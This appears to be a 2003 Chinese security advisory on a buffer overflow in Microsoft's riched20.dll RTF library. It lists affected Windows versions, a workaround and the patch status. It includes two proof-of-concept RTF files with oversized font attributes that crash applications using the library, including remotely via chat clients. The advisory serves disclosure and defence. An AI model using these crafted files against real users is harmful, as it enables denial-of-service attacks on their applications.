安全研究
安全漏洞
Microsoft Riched20.dll属性缓冲区溢出漏洞
发布日期:2003-02-17
更新日期:2003-02-24
受影响系统:
Microsoft Riched20.dll描述:
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP3
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
BUGTRAQ ID: 6874
riched20.dll是Windows下处理RTF格式的库。
riched20.dll在处理特殊构建的RTF格式文件时缺少缓冲区检查,本地或远程攻击者可以利用这个漏洞使调用此库的应用程序崩溃。
在处理RTF文件代码时,在画图形字符串(如字符大小)的时候,如果在属性中设置超过65536字节,就可以发生缓冲区溢出。如下面的RTF文件会导致非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs"用于设置"www.yoursft.com"的大小,当图形字符串设置的字体大小超过1024字节,会导致缓冲区溢出。如果超过65536字节,会使应用程序崩溃。此问题不仅在"\fs"属性设置上,其他属性也会产生类似问题,如下面的RTF文件也可以造成非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
攻击者也可以远程发送消息使调用riched20.dll库的应用程序崩溃(如OICQ)。
<*来源:Jie Dong (Thkrdev@yoursft.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104549602124757&w=2
*>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 可用高版本riched20.dll覆盖原来版本来进行暂时修补。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:3578
严重程度:0(网友投票)
绿盟科技给您安全的保障